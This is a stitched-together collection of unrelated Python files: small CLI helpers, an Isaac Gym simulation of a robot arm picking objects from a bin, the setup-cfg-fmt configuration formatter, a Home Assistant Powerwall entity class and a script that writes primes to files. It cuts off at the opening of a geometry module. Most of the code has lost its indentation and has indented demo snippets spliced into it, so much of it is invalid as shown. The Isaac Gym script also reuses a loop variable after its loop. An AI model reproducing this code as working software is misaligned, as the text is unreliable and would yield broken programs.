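def _demo_merge_dicts():
    d1 = {"build": {"flags": ["-O2"]}, "name": "old"}
    d2 = {"build": {"debug": True}, "name": "new"}
    merged = merge_dicts(d1, d2)
    assert merged == {"build": {"flags": ["-O2"], "debug": True}, "name": "new"}
    assert merged is d1  # d1 is mutated and returned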
def print_labeled_bar(label, is_error=False, fg=None):
terminal_width, _ = click.get_terminal_size()
width = len(click.unstyle(label))
half_line = "=" * int((terminal_width - width - 2) / 2)
click.secho("%s %s %s" % (half_line, label, half_line), fg=fg, err=is_error)
def humanize_duration_time(duration):
if duration is None:
return duration
duration = duration * 1000
tokens = []
for multiplier in (3600000, 60000, 1000, 1):
fraction = math.floor(duration / multiplier)
tokens.append(int(round(duration) if multiplier == 1 else fraction))
duration -= fraction * multiplier
return "{:02d}:{:02d}:{:02d}.{:03d}".format(*tokens)
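# Illustrative sketch (an assumption): the input is a duration in seconds and
# the output is HH:MM:SS.mmm, e.g. 3661.5 s -> 1 h, 1 min, 1 s, 500 ms.
def _demo_humanize_duration_time():
    assert humanize_duration_time(3661.5) == "01:01:01.500"
    assert humanize_duration_time(None) is None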
def get_original_version(version):
if version.count(".") != 2:
return None
_, raw = version.split(".")[:2]
if int(raw) <= 99:
return None
if int(raw) <= 9999:
return "%s.%s" % (raw[:-2], int(raw[-2:]))
return "%s.%s.%s" % (raw[:-4], int(raw[-4:-2]), int(raw[-2:]))
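# Illustrative sketch (an assumption about the version encoding): a middle
# component larger than 99 packs an "original" upstream version.
def _demo_get_original_version():
    assert get_original_version("1.2.3") is None
    assert get_original_version("1.803.0") == "8.3"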
|
the-stack_106_13022
|
"""
Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
NVIDIA CORPORATION and its licensors retain all intellectual property
and proprietary rights in and to this software, related documentation
and any modifications thereto. Any use, reproduction, disclosure or
distribution of this software and related documentation without an express
license agreement from NVIDIA CORPORATION is strictly prohibited.
Kuka bin performance test
-------------------------------
Test simulation performance and stability of the robotic arm dealing with a set of complex objects in a bin.
"""
from __future__ import print_function, division, absolute_import
import os
import math
import numpy as np
from isaacgym import gymapi
from isaacgym import gymutil
from isaacgym import gymtorch
import matplotlib
import matplotlib.pyplot as plt
from PIL import Image as Im
from copy import copy
axes_geom = gymutil.AxesGeometry(0.1)
sphere_rot = gymapi.Quat.from_euler_zyx(0.5 * math.pi, 0, 0)
sphere_pose = gymapi.Transform(r=sphere_rot)
sphere_geom = gymutil.WireframeSphereGeometry(0.03, 12, 12, sphere_pose, color=(1, 0, 0))
colors = [gymapi.Vec3(1.0, 0.0, 0.0),
gymapi.Vec3(1.0, 127.0/255.0, 0.0),
gymapi.Vec3(1.0, 1.0, 0.0),
gymapi.Vec3(0.0, 1.0, 0.0),
gymapi.Vec3(0.0, 0.0, 1.0),
gymapi.Vec3(39.0/255.0, 0.0, 51.0/255.0),
gymapi.Vec3(139.0/255.0, 0.0, 1.0)]
tray_color = gymapi.Vec3(0.24, 0.35, 0.8)
banana_color = gymapi.Vec3(0.85, 0.88, 0.2)
brick_color = gymapi.Vec3(0.9, 0.5, 0.1)
# initialize gym
gym = gymapi.acquire_gym()
# parse arguments
args = gymutil.parse_arguments(
description="Kuka Bin Test",
custom_parameters=[
{"name": "--num_envs", "type": int, "default": 1, "help": "Number of environments to create"},
{"name": "--num_objects", "type": int, "default": 1, "help": "Number of objects in the bin"},
{"name": "--object_type", "type": int, "default": 0, "help": "Type of bjects to place in the bin: 0 - box, 1 - meat can, 2 - banana, 3 - mug, 4 - brick, 5 - random"}])
num_envs = args.num_envs
num_objects = args.num_objects
box_size = 0.05
# configure sim
sim_type = args.physics_engine
sim_params = gymapi.SimParams()
if sim_type == gymapi.SIM_FLEX:
sim_params.substeps = 4
sim_params.flex.solver_type = 5
sim_params.flex.num_outer_iterations = 4
sim_params.flex.num_inner_iterations = 20
sim_params.flex.relaxation = 0.75
sim_params.flex.warm_start = 0.8
elif sim_type == gymapi.SIM_PHYSX:
sim_params.substeps = 2
sim_params.physx.solver_type = 1
sim_params.physx.num_position_iterations = 25
sim_params.physx.num_velocity_iterations = 0
sim_params.physx.num_threads = args.num_threads
sim_params.physx.use_gpu = args.use_gpu
sim_params.physx.rest_offset = 0.001
sim_params.up_axis = gymapi.UP_AXIS_Y
#sim_params.gravity = gymapi.Vec3(0.0, -9.81, 0.0)
sim_params.use_gpu_pipeline = False
if args.use_gpu_pipeline:
print("WARNING: Forcing CPU pipeline.")
sim = gym.create_sim(args.compute_device_id, args.graphics_device_id, sim_type, sim_params)
if sim is None:
print("*** Failed to create sim")
quit()
# add ground plane
plane_params = gymapi.PlaneParams()
gym.add_ground(sim, plane_params)
# create viewer
viewer = gym.create_viewer(sim, gymapi.CameraProperties())
if viewer is None:
print("*** Failed to create viewer")
quit()
# load assets
asset_root = "../assets"
table_dims = gymapi.Vec3(0.6, 0.2, 1.0)
base_dims = gymapi.Vec3(0.2, 0.2, 0.2)
ur10_pose = gymapi.Transform()
ur10_pose.p = gymapi.Vec3(0.0, 0.2, 0.0)
ur10_pose.r = gymapi.Quat.from_euler_zyx(-0.5 * math.pi, 0, 0)
asset_options = gymapi.AssetOptions()
asset_options.armature = 0.001
asset_options.fix_base_link = True
asset_options.thickness = 0.002
asset_options.mesh_normal_mode = gymapi.COMPUTE_PER_VERTEX
table_pose = gymapi.Transform()
table_pose.p = gymapi.Vec3(0.5, 0.5 * table_dims.y + 0.001, 0.0)
base_pose = gymapi.Transform()
base_pose.p = gymapi.Vec3(0.0, 0.5 * base_dims.y, 0.0)
bin_pose = gymapi.Transform()
bin_pose.r = gymapi.Quat(-0.707107, 0.0, 0.0, 0.707107)
object_pose = gymapi.Transform()
table_asset = gym.create_box(sim, table_dims.x, table_dims.y, table_dims.z, asset_options)
# load assets of objects in a bin
asset_options.fix_base_link = False
can_asset_file = "urdf/ycb/010_potted_meat_can/010_potted_meat_can.urdf"
banana_asset_file = "urdf/ycb/011_banana/011_banana.urdf"
mug_asset_file = "urdf/ycb/025_mug/025_mug.urdf"
brick_asset_file = "urdf/ycb/061_foam_brick/061_foam_brick.urdf"
object_files = []
object_files.append(can_asset_file)
object_files.append(banana_asset_file)
object_files.append(mug_asset_file)
object_files.append(brick_asset_file)
object_assets = []
object_assets.append(gym.create_box(sim, box_size, box_size, box_size, asset_options))
object_assets.append(gym.load_asset(sim, asset_root, can_asset_file, asset_options))
object_assets.append(gym.load_asset(sim, asset_root, banana_asset_file, asset_options))
object_assets.append(gym.load_asset(sim, asset_root, mug_asset_file, asset_options))
object_assets.append(gym.load_asset(sim, asset_root, brick_asset_file, asset_options))
spawn_height = gymapi.Vec3(0.0, 0.3, 0.0)
# load bin asset
bin_asset_file = "robot_package/base/urdf/base.urdf"
print("Loading asset '%s' from '%s'" % (bin_asset_file, asset_root))
bin_asset = gym.load_asset(sim, asset_root, bin_asset_file, asset_options)
corner = table_pose.p - table_dims * 0.5
asset_root = "../assets"
ur10_asset_file = "ur_robotics/ur5_gripper/ur5_gripper.urdf"
asset_options.fix_base_link = True
asset_options.flip_visual_attachments = True
asset_options.collapse_fixed_joints = True
asset_options.use_mesh_materials = True
if sim_type == gymapi.SIM_FLEX:
asset_options.max_angular_velocity = 40.
print("Loading asset '%s' from '%s'" % (ur10_asset_file, asset_root))
ur10_asset = gym.load_asset(sim, asset_root, ur10_asset_file, asset_options)
# set up the env grid
spacing = 1.5
env_lower = gymapi.Vec3(-spacing, 0.0, -spacing)
env_upper = gymapi.Vec3(spacing, spacing, spacing)
# cache some common handles for later use
envs = []
tray_handles = []
object_handles = []
# Attractors setup
ur10_attractors = ["robotiq_85_left_finger_tip_link"]
# attractors_offsets = [gymapi.Transform(), gymapi.Transform(), gymapi.Transform(), gymapi.Transform(), gymapi.Transform()]
# # Coordinates to offset attractors to tips of fingers
# # thumb
# attractors_offsets[1].p = gymapi.Vec3(0.07, 0.01, 0)
# attractors_offsets[1].r = gymapi.Quat(0.0, 0.0, 0.216433, 0.976297)
# # index, middle and ring
# for i in range(2, 5):
# attractors_offsets[i].p = gymapi.Vec3(0.055, 0.015, 0)
# attractors_offsets[i].r = gymapi.Quat(0.0, 0.0, 0.216433, 0.976297)
attractor_handles = {}
print("Creating %d environments" % num_envs)
num_per_row = int(math.sqrt(num_envs))
base_poses = []
for i in range(num_envs):
# create env
env = gym.create_env(sim, env_lower, env_upper, num_per_row)
envs.append(env)
table_handle = gym.create_actor(env, table_asset, table_pose, "table", i, 0)
base_handle = gym.create_actor(env, table_asset, base_pose, "base", i, 0)
x = corner.x + table_dims.x * 0.5
y = table_dims.y + box_size + 0.01
z = corner.z + table_dims.z * 0.5
bin_pose.p = gymapi.Vec3(x, y, z)
tray_handles.append(gym.create_actor(env, bin_asset, bin_pose, "bin", i, 0))
gym.set_rigid_body_color(env, tray_handles[-1], 0, gymapi.MESH_VISUAL_AND_COLLISION, tray_color)
for j in range(num_objects):
x = corner.x + table_dims.x * 0.5 + np.random.rand() * 0.35 - 0.2
y = table_dims.y + box_size * 1.2 * j - 0.05
z = corner.z + table_dims.z * 0.5 + np.random.rand() * 0.3 - 0.15
object_pose.p = gymapi.Vec3(x, y, z) + spawn_height
object_asset = object_assets[0]
if args.object_type >= 5:
object_asset = object_assets[np.random.randint(len(object_assets))]
else:
object_asset = object_assets[args.object_type]
object_handles.append(gym.create_actor(env, object_asset, object_pose, "object" + str(j), i, 0))
if args.object_type == 2:
color = gymapi.Vec3(banana_color.x + np.random.rand()*0.1, banana_color.y + np.random.rand()*0.05, banana_color.z)
gym.set_rigid_body_color(env, object_handles[-1], 0, gymapi.MESH_VISUAL_AND_COLLISION, color)
elif args.object_type == 4:
color = gymapi.Vec3(brick_color.x + np.random.rand()*0.1, brick_color.y + np.random.rand()*0.04, brick_color.z + np.random.rand()*0.05)
gym.set_rigid_body_color(env, object_handles[-1], 0, gymapi.MESH_VISUAL_AND_COLLISION, color)
else:
gym.set_rigid_body_color(env, object_handles[-1], 0, gymapi.MESH_VISUAL_AND_COLLISION, colors[j % len(colors)])
# add ur10
ur10_handle = gym.create_actor(env, ur10_asset, ur10_pose, "ur10", i, 1)
ur10_handles = []
attractor_handles[i] = []
ur10_body_dict = gym.get_actor_rigid_body_dict(env, ur10_handle)
ur10_props = gym.get_actor_rigid_body_states(env, ur10_handle, gymapi.STATE_POS)
#my attractors
for j, body in enumerate(ur10_attractors):
attractor_properties = gymapi.AttractorProperties()
attractor_properties.stiffness = 1e6
attractor_properties.damping = 5e2
body_handle = gym.find_actor_rigid_body_handle(env, ur10_handle, body)
attractor_properties.target = ur10_props['pose'][:][ur10_body_dict[body]]
attractor_properties.target.p.y -= 0.15
# By Default, offset pose is set to origin, so no need to set it
# if j > 0:
# attractor_properties.offset = attractors_offsets[j]
base_poses.append(attractor_properties.target)
if j == 0:
# make attractor in all axes
attractor_properties.axes = gymapi.AXIS_ALL
else:
# make attractor in Translation only
attractor_properties.axes = gymapi.AXIS_TRANSLATION
# attractor_properties.target.p.z=0.1
attractor_properties.rigid_handle = body_handle
gymutil.draw_lines(axes_geom, gym, viewer, env, attractor_properties.target)
gymutil.draw_lines(sphere_geom, gym, viewer, env, attractor_properties.target)
attractor_handle = gym.create_rigid_body_attractor(env, attractor_properties)
attractor_handles[i].append(attractor_handle)
ur10_handles.append(ur10_handle)
# get joint limits and ranges for ur10
ur10_dof_props = gym.get_actor_dof_properties(envs[0], ur10_handles[0])
ur10_lower_limits = ur10_dof_props['lower']
ur10_upper_limits = ur10_dof_props['upper']
ur10_ranges = ur10_upper_limits - ur10_lower_limits
ur10_mids = 0.5 * (ur10_upper_limits + ur10_lower_limits)
ur10_num_dofs = len(ur10_dof_props)
# override default stiffness and damping values
ur10_dof_props['stiffness'].fill(100.0)
ur10_dof_props['damping'].fill(100.0)
# Set base to track pose zero to maintain posture
ur10_dof_props["driveMode"][0] = gymapi.DOF_MODE_POS
for env in envs:
gym.set_actor_dof_properties(env, ur10_handles[i], ur10_dof_props)
# a helper function to initialize all envs
def init():
for i in range(num_envs):
# set updated stiffness and damping properties
gym.set_actor_dof_properties(envs[i], ur10_handles[i], ur10_dof_props)
ur10_dof_states = gym.get_actor_dof_states(envs[i], ur10_handles[i], gymapi.STATE_NONE)
for j in range(ur10_num_dofs):
ur10_dof_states['pos'][j] = ur10_mids[j] - ur10_mids[j] * .5
gym.set_actor_dof_states(envs[i], ur10_handles[i], ur10_dof_states, gymapi.STATE_POS)
# pose.p.x = 0.2 * math.sin(1.5 * t - math.pi * float(i) / num_envs)
# pose.p.y = 0.7 + 0.1 * math.cos(2.5 * t - math.pi * float(i) / num_envs)
# pose.p.z = 0.2 * math.cos(1.5 * t - math.pi * float(i) / num_envs)gymapi.Vec3(0.6, 0.8, 0.0)
def update_ur10(t):
gym.clear_lines(viewer)
for i in range(num_envs):
for j in range(len(attractor_handles[i])):
attractor_properties = gym.get_attractor_properties(envs[i], attractor_handles[i][j])
attr_pose = copy(base_poses[j])
target_pose = gymapi.Transform()
sec = 5
target_pose.p = object_pose.p - spawn_height
attr_pose.p = attr_pose.p + (target_pose.p - attr_pose.p) * t / sec
if (t < sec):
gym.set_attractor_target(envs[i], attractor_handles[i][j], attr_pose)
gymutil.draw_lines(axes_geom, gym, viewer, envs[i], attr_pose)
gymutil.draw_lines(sphere_geom, gym, viewer, envs[i], attr_pose)
init()
next_ur10_update_time = 0.1
frame = 0
# Camera Sensor
camera_props = gymapi.CameraProperties()
camera_props.width = 1280
camera_props.height = 1280
camera_props.enable_tensors = True
camera_handle = gym.create_camera_sensor(env, camera_props)
transform = gymapi.Transform()
transform.p = gymapi.Vec3(1,1,1)
transform.r = gymapi.Quat.from_axis_angle(gymapi.Vec3(0,1,0), np.radians(45.0))
gym.set_camera_transform(camera_handle, env, transform)
debug_fig = plt.figure("debug")
while not gym.query_viewer_has_closed(viewer):
# check if we should update
t = gym.get_sim_time(sim)
if t >= next_ur10_update_time:
update_ur10(t)
next_ur10_update_time += 0.01
# step the physics
gym.simulate(sim)
gym.fetch_results(sim, True)
# for env in envs:
# gym.draw_env_rigid_contacts(viewer, env, colors[0], 0.5, True)
# step rendering
gym.step_graphics(sim)
# digest image
gym.render_all_camera_sensors(sim)
gym.start_access_image_tensors(sim)
camera_tensor = gym.get_camera_image_gpu_tensor(sim, envs[0], camera_handle, gymapi.IMAGE_COLOR)
torch_camera_tensor = gymtorch.wrap_tensor(camera_tensor)
cam_img = torch_camera_tensor.cpu().numpy()
cam_img = Im.fromarray(cam_img)
plt.imshow(cam_img)
plt.pause(1e-9)
debug_fig.clf()
gym.end_access_image_tensors(sim)
gym.draw_viewer(viewer, sim, False)
gym.sync_frame_time(sim)
frame = frame + 1
print("Done")
gym.destroy_viewer(viewer)
gym.destroy_sim(sim)
|
the-stack_106_13024
|
import argparse
import configparser
import glob
import io
import os.path
import re
from typing import Dict
from typing import List
from typing import Match
from typing import Optional
from typing import Sequence
from typing import Set
from typing import Tuple
from identify import identify
KEYS_ORDER: Tuple[Tuple[str, Tuple[str, ...]], ...] = (
(
'metadata', (
'name', 'version', 'description',
'long_description', 'long_description_content_type',
'url', 'author', 'author_email', 'license', 'license_file',
'platforms', 'classifiers',
),
),
(
'options', (
'packages', 'py_modules', 'install_requires', 'python_requires',
),
),
('options.sections.find', ('where', 'exclude', 'include')),
('options.entry_points', ('console_scripts',)),
('options.extras_require', ()),
('options.package_data', ()),
('options.exclude_package_data', ()),
)
LICENSE_TO_CLASSIFIER = {
'0BSD': 'License :: OSI Approved :: BSD License',
'AFL-3.0': 'License :: OSI Approved :: Academic Free License (AFL)',
'AGPL-3.0': 'License :: OSI Approved :: GNU Affero General Public License v3', # noqa: E501
'Apache-2.0': 'License :: OSI Approved :: Apache Software License',
'Artistic-2.0': 'License :: OSI Approved :: Artistic License',
'BSD-2-Clause': 'License :: OSI Approved :: BSD License',
'BSD-3-Clause': 'License :: OSI Approved :: BSD License',
'BSD-3-Clause-Clear': 'License :: OSI Approved :: BSD License',
'BSL-1.0': 'License :: OSI Approved :: Boost Software License 1.0 (BSL-1.0)', # noqa: E501
'CC0-1.0': 'License :: CC0 1.0 Universal (CC0 1.0) Public Domain Dedication', # noqa: E501
'EPL-1.0': 'License :: OSI Approved :: Eclipse Public License 1.0 (EPL-1.0)', # noqa: E501
'EPL-2.0': 'License :: OSI Approved :: Eclipse Public License 2.0 (EPL-2.0)', # noqa: E501
'EUPL-1.1': 'License :: OSI Approved :: European Union Public Licence 1.1 (EUPL 1.1)', # noqa: E501
'EUPL-1.2': 'License :: OSI Approved :: European Union Public Licence 1.2 (EUPL 1.2)', # noqa: E501
'GPL-2.0': 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)', # noqa: E501
'GPL-3.0': 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)', # noqa: E501
'ISC': 'License :: OSI Approved :: ISC License (ISCL)',
'LGPL-2.1': 'License :: OSI Approved :: GNU Lesser General Public License v2 (LGPLv2)', # noqa: E501
'LGPL-3.0': 'License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)', # noqa: E501
'MIT': 'License :: OSI Approved :: MIT License',
'MPL-2.0': 'License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)', # noqa: E501
'NCSA': 'License :: OSI Approved :: University of Illinois/NCSA Open Source License', # noqa: E501
'OFL-1.1': 'License :: OSI Approved :: SIL Open Font License 1.1 (OFL-1.1)', # noqa: E501
'PostgreSQL': 'License :: OSI Approved :: PostgreSQL License',
'UPL-1.0': 'License :: OSI Approved :: Universal Permissive License (UPL)',
'Zlib': 'License :: OSI Approved :: zlib/libpng License',
}
def _adjacent_filename(setup_cfg: str, filename: str) -> str:
return os.path.join(os.path.dirname(setup_cfg), filename)
GLOB_PART = re.compile(r'(\[[^]]+\]|.)')
def _case_insensitive_glob(s: str) -> str:
def cb(match: Match[str]) -> str:
match_s = match.group()
if len(match_s) == 1:
return f'[{match_s.upper()}{match_s.lower()}]'
else:
inner = ''.join(f'{c.upper()}{c.lower()}' for c in match_s[1:-1])
return f'[{inner}]'
return GLOB_PART.sub(cb, s)
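# Illustrative sketch (not part of setup-cfg-fmt): every literal character is
# wrapped in a two-letter character class and existing [...] groups gain the
# upper-case variants, so 'licen[sc]e' matches LICENSE and LICENCE too.
def _demo_case_insensitive_glob():
    assert _case_insensitive_glob('readme') == '[Rr][Ee][Aa][Dd][Mm][Ee]'
    assert _case_insensitive_glob('licen[sc]e') == '[Ll][Ii][Cc][Ee][Nn][SsCc][Ee]'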
def _first_file(setup_cfg: str, prefix: str) -> Optional[str]:
prefix = _case_insensitive_glob(prefix)
path = _adjacent_filename(setup_cfg, prefix)
for filename in glob.iglob(f'{path}*'):
return filename
else:
return None
def _py3_excluded(min_py3_version: Tuple[int, int]) -> Set[Tuple[int, int]]:
_, end = min_py3_version
return {(3, i) for i in range(end)}
def _format_python_requires(
minimum: Tuple[int, int],
excluded: Set[Tuple[int, int]],
) -> str:
return ', '.join((
f'>={_v(minimum)}', *(f'!={_v(v)}.*' for v in sorted(excluded)),
))
class UnknownVersionError(ValueError):
pass
def _to_ver(s: str) -> Tuple[int, int]:
parts = [part for part in s.split('.') if part != '*']
if len(parts) != 2:
raise UnknownVersionError()
else:
return int(parts[0]), int(parts[1])
def _v(x: Tuple[int, ...]) -> str:
return '.'.join(str(p) for p in x)
def _parse_python_requires(
python_requires: Optional[str],
) -> Tuple[Optional[Tuple[int, int]], Set[Tuple[int, int]]]:
minimum = None
excluded = set()
if python_requires:
for part in python_requires.split(','):
part = part.strip()
if part.startswith('>='):
minimum = _to_ver(part[2:])
elif part.startswith('!='):
excluded.add(_to_ver(part[2:]))
else:
raise UnknownVersionError()
return minimum, excluded
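# Illustrative sketch (not part of setup-cfg-fmt): a simple specifier
# round-trips through _parse_python_requires and _format_python_requires;
# anything it cannot parse raises UnknownVersionError instead.
def _demo_python_requires_round_trip():
    minimum, excluded = _parse_python_requires('>=3.6, !=3.7.*')
    assert minimum == (3, 6) and excluded == {(3, 7)}
    assert _format_python_requires(minimum, excluded) == '>=3.6, !=3.7.*'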
def _python_requires(
setup_cfg: str, *, min_py3_version: Tuple[int, int],
) -> Optional[str]:
cfg = configparser.ConfigParser()
cfg.read(setup_cfg)
current_value = cfg.get('options', 'python_requires', fallback='')
classifiers = cfg.get('metadata', 'classifiers', fallback='')
try:
minimum, excluded = _parse_python_requires(current_value)
except UnknownVersionError: # assume they know what's up with weird things
return current_value
tox_ini = _adjacent_filename(setup_cfg, 'tox.ini')
if os.path.exists(tox_ini):
cfg = configparser.ConfigParser()
cfg.read(tox_ini)
envlist = cfg.get('tox', 'envlist', fallback='')
if envlist:
for env in envlist.split(','):
env = env.strip()
env, _, _ = env.partition('-') # py36-foo
if (
env.startswith('py') and
len(env) == 4 and
env[2:].isdigit()
):
version = _to_ver('.'.join(env[2:]))
if minimum is None or version < minimum:
minimum = version
for classifier in classifiers.strip().splitlines():
if classifier.startswith('Programming Language :: Python ::'):
version_part = classifier.split()[-1]
if '.' not in version_part:
continue
version = _to_ver(version_part)
if minimum is None or version < minimum:
minimum = version
if minimum is None:
return None
elif minimum[0] == 2:
excluded.update(_py3_excluded(min_py3_version))
return _format_python_requires(minimum, excluded)
elif min_py3_version > minimum:
return _format_python_requires(min_py3_version, excluded)
else:
return _format_python_requires(minimum, excluded)
def _requires(cfg: configparser.ConfigParser, which: str) -> List[str]:
raw = cfg.get('options', which, fallback='')
install_requires = raw.strip().splitlines()
if not install_requires:
return []
normalized = sorted(
(_normalize_req(req) for req in install_requires),
key=lambda req: (';' in req, _req_base(req), req),
)
normalized.insert(0, '')
return normalized
def _normalize_req(req: str) -> str:
lib, _, envs = req.partition(';')
normalized = _normalize_lib(lib)
envs = envs.strip()
if not envs:
return normalized
return f'{normalized};{envs}'
BASE_NAME_REGEX = re.compile(r'[^!=><\s]+')
REQ_REGEX = re.compile(r'(===|==|!=|~=|>=?|<=?)\s*([^,]+)')
def _normalize_lib(lib: str) -> str:
base = _req_base(lib)
conditions = ','.join(
sorted(
(
f'{m.group(1)}{m.group(2)}'
for m in REQ_REGEX.finditer(lib)
),
            key=lambda c: ('<' in c, '>' in c, c),
),
)
return f'{base}{conditions}'
def _req_base(lib: str) -> str:
basem = re.match(BASE_NAME_REGEX, lib)
assert basem
return basem.group(0)
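# Illustrative sketch (not part of setup-cfg-fmt): requirement strings lose
# the whitespace around their pins, and multiple pins are sorted so that
# lower bounds come before upper bounds.
def _demo_normalize_req():
    assert _normalize_req('Requests >= 2.0') == 'Requests>=2.0'
    assert _normalize_lib('pkg <3, >=2.0') == 'pkg>=2.0,<3'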
def _py_classifiers(
python_requires: Optional[str], *, max_py_version: Tuple[int, int],
) -> Optional[str]:
try:
minimum, exclude = _parse_python_requires(python_requires)
except UnknownVersionError:
return None
if minimum is None: # don't have a sequence of versions to iterate over
return None
versions: Set[Tuple[int, ...]] = set()
while minimum <= max_py_version:
if minimum not in exclude:
versions.add(minimum)
versions.add(minimum[:1])
if minimum == (2, 7):
minimum = (3, 0)
else:
minimum = (minimum[0], minimum[1] + 1)
classifiers = [
f'Programming Language :: Python :: {_v(v)}' for v in versions
]
if (3,) in versions and (2,) not in versions:
classifiers.append('Programming Language :: Python :: 3 :: Only')
return '\n'.join(classifiers)
def _trim_py_classifiers(
classifiers: List[str],
python_requires: Optional[str],
*,
max_py_version: Tuple[int, int],
) -> List[str]:
try:
minimum, exclude = _parse_python_requires(python_requires)
except UnknownVersionError:
return classifiers
def _is_ok_classifier(s: str) -> bool:
parts = s.split(' :: ')
if (
# can't know if it applies without a minimum
minimum is None or
# handle Python :: 3 :: Only
len(parts) != 3 or
not s.startswith('Programming Language :: Python :: ')
):
return True
ver = tuple(int(p) for p in parts[-1].strip().split('.'))
size = len(ver)
return (
ver not in exclude and
# https://github.com/python/mypy/issues/7056
minimum[:size] <= ver <= max_py_version[:size] # type: ignore
)
return [s for s in classifiers if _is_ok_classifier(s)]
def format_file(
filename: str, *,
min_py3_version: Tuple[int, int],
max_py_version: Tuple[int, int],
) -> bool:
with open(filename) as f:
contents = f.read()
cfg = configparser.ConfigParser()
cfg.read_string(contents)
# normalize names to underscores so sdist / wheel have the same prefix
cfg['metadata']['name'] = cfg['metadata']['name'].replace('-', '_')
# if README.md exists, set `long_description` + content type
readme = _first_file(filename, 'readme')
if readme is not None:
long_description = f'file: {os.path.basename(readme)}'
cfg['metadata']['long_description'] = long_description
tags = identify.tags_from_filename(readme)
if 'markdown' in tags:
cfg['metadata']['long_description_content_type'] = 'text/markdown'
elif 'rst' in tags:
cfg['metadata']['long_description_content_type'] = 'text/x-rst'
else:
cfg['metadata']['long_description_content_type'] = 'text/plain'
# set license fields if a license exists
license_filename = _first_file(filename, 'licen[sc]e')
if license_filename is not None:
cfg['metadata']['license_file'] = os.path.basename(license_filename)
license_id = identify.license_id(license_filename)
if license_id is not None:
cfg['metadata']['license'] = license_id
if license_id in LICENSE_TO_CLASSIFIER:
cfg['metadata']['classifiers'] = (
cfg['metadata'].get('classifiers', '').rstrip() +
f'\n{LICENSE_TO_CLASSIFIER[license_id]}'
)
requires = _python_requires(filename, min_py3_version=min_py3_version)
if requires is not None:
if not cfg.has_section('options'):
cfg.add_section('options')
cfg['options']['python_requires'] = requires
install_requires = _requires(cfg, 'install_requires')
if install_requires:
cfg['options']['install_requires'] = '\n'.join(install_requires)
setup_requires = _requires(cfg, 'setup_requires')
if setup_requires:
cfg['options']['setup_requires'] = '\n'.join(setup_requires)
py_classifiers = _py_classifiers(requires, max_py_version=max_py_version)
if py_classifiers:
cfg['metadata']['classifiers'] = (
cfg['metadata'].get('classifiers', '').rstrip() +
f'\n{py_classifiers}'
)
# sort the classifiers if present
if 'classifiers' in cfg['metadata']:
classifiers = sorted(set(cfg['metadata']['classifiers'].split('\n')))
classifiers = _trim_py_classifiers(
classifiers, requires, max_py_version=max_py_version,
)
cfg['metadata']['classifiers'] = '\n'.join(classifiers)
sections: Dict[str, Dict[str, str]] = {}
for section, key_order in KEYS_ORDER:
if section not in cfg:
continue
new_section = {
k: cfg[section].pop(k) for k in key_order if k in cfg[section]
}
# sort any remaining keys
new_section.update(sorted(cfg[section].items()))
sections[section] = new_section
cfg.pop(section)
for section in cfg.sections():
sections[section] = dict(cfg[section])
cfg.pop(section)
for k, v in sections.items():
cfg[k] = v
sio = io.StringIO()
cfg.write(sio)
new_contents = sio.getvalue().strip() + '\n'
new_contents = new_contents.replace('\t', ' ')
new_contents = new_contents.replace(' \n', '\n')
if new_contents != contents:
with open(filename, 'w') as f:
f.write(new_contents)
return new_contents != contents
def _ver_type(s: str) -> Tuple[int, int]:
try:
return _to_ver(s)
except UnknownVersionError:
raise argparse.ArgumentTypeError(f'expected #.#, got {s!r}')
def main(argv: Optional[Sequence[str]] = None) -> int:
parser = argparse.ArgumentParser()
parser.add_argument('filenames', nargs='*')
parser.add_argument('--min-py3-version', type=_ver_type, default=(3, 5))
parser.add_argument('--max-py-version', type=_ver_type, default=(3, 7))
args = parser.parse_args(argv)
for filename in args.filenames:
if format_file(
filename,
min_py3_version=args.min_py3_version,
max_py_version=args.max_py_version,
):
print(f'Rewriting {filename}')
return 0
if __name__ == '__main__':
exit(main())
|
the-stack_106_13025
|
"""The Tesla Powerwall integration base entity."""
from homeassistant.helpers.entity import Entity
from .const import (
DOMAIN,
MANUFACTURER,
MODEL,
POWERWALL_SITE_NAME,
SITE_INFO_GRID_CODE,
SITE_INFO_NOMINAL_SYSTEM_ENERGY_KWH,
SITE_INFO_UTILITY,
)
class PowerWallEntity(Entity):
"""Base class for powerwall entities."""
def __init__(self, coordinator, site_info):
"""Initialize the sensor."""
super().__init__()
self._coordinator = coordinator
self._site_info = site_info
        # This group of properties will be unique to the site
unique_group = (
site_info[SITE_INFO_UTILITY],
site_info[SITE_INFO_GRID_CODE],
str(site_info[SITE_INFO_NOMINAL_SYSTEM_ENERGY_KWH]),
)
self.base_unique_id = "_".join(unique_group)
@property
def device_info(self):
"""Powerwall device info."""
return {
"identifiers": {(DOMAIN, self.base_unique_id)},
"name": self._site_info[POWERWALL_SITE_NAME],
"manufacturer": MANUFACTURER,
"model": MODEL,
}
@property
def available(self):
"""Return True if entity is available."""
return self._coordinator.last_update_success
@property
def should_poll(self):
"""Return False, updates are controlled via coordinator."""
return False
async def async_update(self):
"""Update the entity.
Only used by the generic entity update service.
"""
await self._coordinator.async_request_refresh()
async def async_added_to_hass(self):
"""Subscribe to updates."""
self._coordinator.async_add_listener(self.async_write_ha_state)
async def async_will_remove_from_hass(self):
"""Undo subscription."""
self._coordinator.async_remove_listener(self.async_write_ha_state)
|
the-stack_106_13026
|
"""
Write the prime numbers between 1 and 9999 into three files: primes between 1 and 99
are saved in a.txt, primes between 100 and 999 in b.txt, and primes between 1000 and 9999 in c.txt.
"""
from math import sqrt
def is_prime(n):
"""判断素数的函数"""
assert n > 0
for factor in range(2, int(sqrt(n)) + 1):
if n % factor == 0:
return False
    return n != 1
def main():
filenames = ('a.txt', 'b.txt', 'c.txt')
fs_list = []
try:
for filename in filenames:
fs_list.append(open(filename, 'w', encoding='utf-8'))
for number in range(1, 10000):
if is_prime(number):
if number < 100:
fs_list[0].write(str(number) + '\n')
elif number < 1000:
fs_list[1].write(str(number) + '\n')
else:
fs_list[2].write(str(number) + '\n')
except IOError as ex:
print(ex)
        print('An error occurred while writing the files!')
finally:
for fs in fs_list:
fs.close()
        print('Operation completed!')
if __name__ == '__main__':
main()
# Try this and see what is different
# # with open('prime.txt', 'a') as f:
# with open('prime.txt', 'w') as f:
# for num in range(2, 100):
# if is_prime(num):
# f.write(str(num) + '\n')
#     print('Writing finished!')
|
the-stack_106_13028
|
"""Base geometry class and utilities
Note: a third, z, coordinate value may be used when constructing
